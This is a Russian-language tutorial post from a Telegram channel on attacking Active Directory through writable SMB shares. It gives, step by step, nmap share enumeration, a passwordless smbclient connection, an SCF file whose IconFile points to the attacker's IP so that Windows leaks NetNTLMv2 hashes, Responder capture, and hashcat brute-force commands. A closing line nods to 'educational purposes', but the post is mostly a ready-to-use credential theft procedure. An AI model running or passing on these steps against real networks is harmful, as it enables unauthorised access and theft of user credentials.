Еще один вариант атаки на Active Directory

Специально для канала @webware

Приветствуем всех читателей. Сегодня рассмотрим еще один вариант атаки на Active Directory. Ранее мы разбирали перехват и вскрытие хешей, которые «летают» по сети, теперь же разберём случай, в котором необходимо помочь пакетам «полететь» по сети.

Сперва сканируем сеть на предмет файловых хранилищ с подключением без пароля:

nmap -p 445 -sV --script=smb-enum-shares <ip>/<маска_в_десятичном_формате>, где:

●      -p — порт;

●      -sV — проверка версии сервиса;

●      --script=smb-enum-shares — подключение скрипта, чтобы узнать список сетевых ресурсов и права на них.

Необходим ресурс, в котором права нынешнего пользователя будут как на чтение, так и на запись (это видно в выводе скрипта). Для доступа без пароля подключение выполняется следующей командой:

smbclient \\\\<ip>\\<название_сетевого_ресурса>

В это хранилище загружаем SCF файл. Формат файла scf — файлы команды для проводника. Запускать его никому не придётся, ведь Windows заходит в директорию и ищет в ней scf-файлы или, например, ярлыки. Если находит, проверяет оригинальный файл, на который они ссылаются. Содержимое файла следующее:

[Shell]

Command=2

IconFile=\\<ваш_ip>\<произвольный_путь,_может_не_существовать>

[Taskbar]

Command=ToggleDesktop

Поскольку есть подключение к консоли smb, можем добавить в неё файл командой:

put <ваш_файл>

В это же время запускаем responder (об этой утилите рассказывалось в предыдущей части):

Responder -I eth0 -wrf

Работать предстоит с NetNTLMv2, как заметно из названия, это старший брат NTLM, то есть защищён лучше и брутить его дольше, но ничего нас не остановит

После получения хеша начинаем его обработку. Команда следующая:

hashcat -m 5600 -a 3 <Файл_с_хешем> -w 2 -O -1 ?l?d -i --increment-min=1 --increment-max=6 ?1?1?1?1?1?1, где:

●      -m 5600 — тип NetNTLMv2;

●      -a 3 — атака перебора по маске;

●      -w 2 — чем больше цифра, тем сильнее нагрузка (1-4);

●      -O — оптимизация ядра, если возможно;

●      -1 ?l?d — определяем пользовательский словарь из маленьких латинских и цифр;

●      -i –increment-min=1 –increment-max=6 — последовательный перебор количества символов;

●      ?1?1?1?1?1?1 — маска. Применяет пользовательский словарь к каждому символу.

Осталось добрутить и протестировать результаты. Думается, с этим все справятся. Используйте полученные знания в образовательных целях! До новых встреч на канале https://t.me/webware